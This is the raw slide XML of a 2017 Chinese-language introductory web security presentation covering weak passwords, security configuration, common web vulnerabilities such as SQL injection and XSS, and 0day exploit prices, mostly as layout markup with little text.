              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="10" name="直接连接符 23"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1123569" y="535692"/>
                <a:ext cx="213302" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25402" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362075" y="977421"/>
            <a:ext cx="10344149" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>弱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>安全配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="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smtClean="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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4206805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461665"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261519" y="956616"/>
            <a:ext cx="8400000" cy="3657143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2019842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461665"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>安全配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38100" y="1195588"/>
            <a:ext cx="12020550" cy="3209524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580227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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="333477"/>
            <a:ext cx="10344149" cy="461665"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488581" y="777454"/>
            <a:ext cx="6714286" cy="5238095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="1077135"/>
            <a:ext cx="5225142" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞都是一个模型，特定的输入产生特定的输出，就可以判断为一个漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1799927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46287" y="1085850"/>
            <a:ext cx="8345713" cy="297179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1607053" y="1085850"/>
            <a:ext cx="2194785" cy="2971799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="28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3846287" y="1085850"/>
            <a:ext cx="8345713" cy="2971799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="28436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498193" y="4272877"/>
            <a:ext cx="2236510" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>安全无小事</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284360"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1160273" y="4412961"/>
            <a:ext cx="154009" cy="301311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="28436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284360"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591788" y="4272877"/>
            <a:ext cx="3376376" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284360"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接连接符 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7758113" y="5780982"/>
            <a:ext cx="4433887" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="28436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35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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653711" y="510144"/>
            <a:ext cx="8612943" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞通常是指网站程序上的漏洞，可能是由于代码编写者在编写代码时考虑不周全等原因而造成的漏洞，常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、上传漏洞等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4231434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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838186" y="377497"/>
            <a:ext cx="8612943" cy="1015663"/>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zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>价格</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>国外漏洞军火厂商</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ZERODIUM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞利用价码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="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065" y="1408310"/>
            <a:ext cx="6671691" cy="5051633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8752031" y="1566153"/>
            <a:ext cx="3398196" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程越狱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞利用价格高达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1500000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>刀</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1157012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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838186" y="377497"/>
            <a:ext cx="8612943" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>预警</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本来是想使用他人写好的漏洞环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">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a typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1496945840585&amp;di=21ce2452d84a50f7606160a156bfe03f&amp;imgtype=0&amp;src=http%3A%2F%2Fs8.sinaimg.cn%2Flarge%2F005OC19Izy6NOI03bOnc7%266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909" y="1393160"/>
            <a:ext cx="6951738" cy="53266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1.sinaimg.cn/mw690/72ebb662gw1fbo5hd9cwlj20qo0qon2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0035" y="1393159"/>
            <a:ext cx="3093700" cy="309370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4055861" y="2026294"/>
            <a:ext cx="3854425" cy="3866433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702081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3563</TotalTime>
  <Words>2557</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>422</Paragraphs>
  <Slides>67</Slides>
  <Notes>44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67</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="76" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Open Sans Light</vt:lpstr>
      <vt:lpstr>Wingdings</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郭沛位</dc:creator>
  <cp:lastModifiedBy>Microsoft Office 用户</cp:lastModifiedBy>
  <cp:revision>150</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-05T02:49:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-13T02:34:39Z</dcterms:modified>
</cp:coreProperties>
</file>